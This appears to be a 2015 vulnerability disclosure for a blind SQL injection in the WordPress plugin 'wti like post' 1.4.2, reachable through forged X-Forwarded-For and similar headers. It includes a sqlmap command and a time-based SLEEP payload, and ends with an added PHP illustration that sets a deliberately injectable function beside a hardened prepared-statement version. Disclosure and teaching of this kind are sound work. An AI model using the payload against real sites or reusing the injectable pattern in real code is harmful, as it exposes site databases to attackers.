Subject: Blind SQL injection in wti like post 1.4.2
Date: Sun, 5 Jul 2015 13:37:39 +0200

Hello,

Plugin: wti like post 1.4.2

Unauthenticated remote attackers can execute arbitrary SQL commands. Please note that the vendor was informed individually on 10.03.2015; however, there is still no fix.

1. SQL injection (WtiLikePostProcessVote())

Method: GET
Url: http://localhost/wp-admin/admin-ajax.php?action=wti_like_post_process_vote&task=like&post_id=62&nonce=!VALIDNONCE!
Vulnerable header parameters: HTTP_CLIENT_IP, HTTP_X_FORWARDED_FOR,
   HTTP_X_FORWARDED, HTTP_FORWARDED_FOR and HTTP_FORWARDED, read by the WtiGetRealIpAddress() function

Example PHP callstack:
  WtiLikePostProcessVote   [/wti-like-post/wti_like_post_ajax.php:94]
  wpdb::query  

Sqlmap verification:

sqlmap --dbms mysql --headers="X-forwarded-for:1*" -u "http://localhost/wp-admin/admin-ajax.php?action=wti_like_post_process_vote&task=like&post_id=62&nonce=!VALIDNONCE!"

...
Parameter: X-forwarded-for #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: 1' AND (SELECT * FROM (SELECT(SLEEP(5)))lweB) AND 'wOmn'='wOmn
...


--
Regards,
Marcin Probola
https://wordpress.org/plugins/wti-like-post/
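As an added illustration (not the plugin's code and not part of the original post), the pattern this advisory describes beside a hardened WordPress equivalent: a "client IP" taken from proxy headers that any client can set is interpolated into SQL, versus validating the address and binding it with $wpdb->prepare(). Function and table names (get_client_ip_*, record_vote_*, {$wpdb->prefix}like_votes) are hypothetical.

```php
<?php
// Added example, not the plugin's code. Hypothetical names throughout.

// Weak pattern: trust proxy headers, which the client controls, and build
// the query by string interpolation. Any header value reaches wpdb::query.
function get_client_ip_unsafe() {
    $keys = array( 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED',
                   'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR' );
    foreach ( $keys as $key ) {
        if ( ! empty( $_SERVER[ $key ] ) ) {
            return $_SERVER[ $key ];
        }
    }
    return '';
}

function record_vote_unsafe( $post_id ) {
    global $wpdb;
    $ip = get_client_ip_unsafe();
    // Header text becomes part of the SQL statement itself.
    return $wpdb->query(
        "SELECT COUNT(*) FROM {$wpdb->prefix}like_votes
         WHERE post_id = $post_id AND ip = '$ip'"
    );
}

// Hardened pattern: use REMOTE_ADDR (the only address the web server vouches
// for), accept nothing that is not an IP literal, and bind every value with
// $wpdb->prepare() so it is treated as data, never as SQL.
function get_client_ip_safe() {
    $ip = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '';
    return filter_var( $ip, FILTER_VALIDATE_IP ) ? $ip : '0.0.0.0';
}

function record_vote_safe( $post_id ) {
    global $wpdb;
    $sql = $wpdb->prepare(
        "SELECT COUNT(*) FROM {$wpdb->prefix}like_votes WHERE post_id = %d AND ip = %s",
        absint( $post_id ),      // %d: integer post id
        get_client_ip_safe()     // %s: quoted and escaped by prepare()
    );
    return (int) $wpdb->get_var( $sql );
}
```

If the site sits behind a reverse proxy you control, derive the address from that proxy's header only after checking REMOTE_ADDR is the proxy itself, and still pass the result through FILTER_VALIDATE_IP before it touches a query.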